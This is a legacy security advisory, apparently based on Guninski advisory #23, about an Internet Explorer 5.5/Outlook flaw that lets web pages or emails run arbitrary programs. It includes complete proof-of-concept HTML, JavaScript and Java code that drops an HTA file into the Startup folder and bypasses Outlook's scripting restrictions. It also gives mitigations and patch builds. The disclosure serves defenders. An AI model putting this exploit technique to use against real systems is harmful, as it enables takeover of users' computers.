COMMAND
IE (com.ms.activeX.ActiveXComponent)
SYSTEMS AFFECTED
IE 5.5./Outlook
PROBLEM
Following is based on a Georgi Guninski security advisory #23.
Internet Explorer 5.5/Outlook allow executing arbitray programs
after viewing web page or email message. This may lead to taking
full control over user's computer.
The problem is the com.ms.activeX.ActiveXComponent java object
which may be instantiated from <APPLET> tag (it throws security
exception in java console, but returns object, strange). The
com.ms.activeX.ActiveXComponent java object allows creating and
scripting arbitrary ActiveX objects, including those not marked
safe for scripting. Examine the code below for more information.
The code is:
---------javaea.html------------------------------------------
<APPLET code="com.ms.activeX.ActiveXComponent" >
</APPLET>
<!-- ^^^ This gives java exceptions in java console, but the object is instantiated -->
<SCRIPT LANGUAGE="JAVASCRIPT">
a1=document.applets[0];
fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA";
//fn="EA.HTA";
doc="<SCRIPT>s1=\'Hello world\\nTo get rid of this, delete the file EA.HTA in Startup folder\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>";
function f1()
{
a1.setProperty('DOC',doc);
}
function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" created');",2000);
}
setTimeout("f()",1000)
</SCRIPT>
<SCRIPT LANGUAGE="VBSCRIPT">
VA = ARRAY()
' Just to get something like com.ms.com.Variant[]
</SCRIPT>
Regarding this issue and Outlook with "security update" (probably
this should be another advisory). It is a bit more difficult to
exploit this from Outlook because of the "Outlook security update"
which stops "most scripting". It is common misbelief that the
"Outlook security update" stops all scripting, but this is not
true. It is possible to trigger the execution of Active Script
from email message with the help of Java.
Send a email message containing
<IFRAME SRC="http://somehost/javascript.html"></IFRAME>
The codes:
-----------javascript.html-------------
<APPLET CODE="outlookjs.class" MAYSCRIPT>
<PARAM NAME="command" VALUE="window.open('http://www.guninski.com')">
</APPLET>
----------outlookjs.java---------------
import java.applet.Applet;
import netscape.javascript.*;
class outlookjs extends Applet {
public JSObject j;
public void init()
{
try {
j=(JSObject) JSObject.getWindow(this);
j.eval(getParameter("command"));
}
catch (Exception e) {System.out.println(e);};
}
}
Demonstration is available at:
http://www.guninski.com/javaea1.html
http://www.guninski.com/javaea2.html
SOLUTION
Disable Active Scripting or Java or Scripting of Java applets -
better disable all active content in IE.
Patch availability:
- 2000-series Microsoft VM customers will be provided with an update soon.
- 3100-series Microsoft VM customers upgrade to build 3318 or later from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3200-series Microsoft VM customers upgrade to build 3318 or later from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3300-series Microsoft VM customers upgrade to build 3318 or later from:
http://www.microsoft.com/java/vm/dl_vm40.htm
This fix supersedes the patch supplied in MS00-059.